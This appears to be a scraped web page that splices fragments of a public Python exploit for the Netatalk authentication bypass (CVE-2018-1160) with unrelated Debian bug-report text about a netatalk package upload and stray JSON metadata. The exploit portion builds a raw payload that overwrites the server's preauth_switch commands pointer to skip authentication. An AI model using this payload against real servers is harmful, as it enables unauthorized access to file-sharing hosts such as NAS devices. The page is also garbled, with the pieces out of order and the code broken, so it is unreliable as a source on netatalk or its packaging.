DEBIAN NETATALK PATCH
Overwrites the commands pointer \n# with the base of the preauth_switch \n# \ndef do_exploit(sock): \nprint \" Sending exploit to overwrite preauth_switch data.\" \ndata = '\\x00\\x04\\x00\\x01\\x00\\x00\\x00\\x00' \ndata += '\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00' \ndata += '\\x01' # attnquant in open sess \ndata += '\\x18' # attnquant size \ndata += '\\xad\\xaa\\xaa\\xba' # overwrites attn_quantum (on purpose) \ndata += '\\xef\\xbe\\xad\\xde' # overwrites datasize \ndata += '\\xfe\\xca\\x1d\\xc0' # overwrites server_quantum \ndata += '\\xce\\xfa\\xed\\xfe' # overwrites the server id and client id \ndata += preauth_switch_base # overwrite the commands ptr \ndall(data) \n \n# don't really care about the respone \nresp = sock.recv(1024) \nreturn \n \n \n# \n# Sends a request to the server. Package: netatalk Version: 2.1.4-1 Severity: normal Tags: patch pending Dear maintainer, Ive prepared an NMU for netatalk (versioned as 2.1.4-1.1) and uploaded it to DELAYED/5. Sets the maximum number of clients that can simultaneously.
The addresses below will need to be changed \n# for a different target.
DEBIAN NETATALK SOFTWARE
, "cvelist":, "modified": "T00:00:00", "id": "PACKETSTORM:150891", "href": "", "sourceData": "`# \n# Exploit Title: Netatalk Authentication Bypass \n# Date: \n# Exploit Author: Jacob Baines \n# Vendor Homepage: \n# Software Link: \n# Version: Before 3.1.12 \n# Tested on: Seagate NAS OS (x86_64) \n# CVE : CVE-2018-1160 \n# Advisory: \n# \nimport argparse \nimport socket \nimport struct \nimport sys \n \n# Known addresses: \n# This exploit was written against a Netatalk compiled for an \n# x86_64 Seagate NAS.
0 kommentar(er)
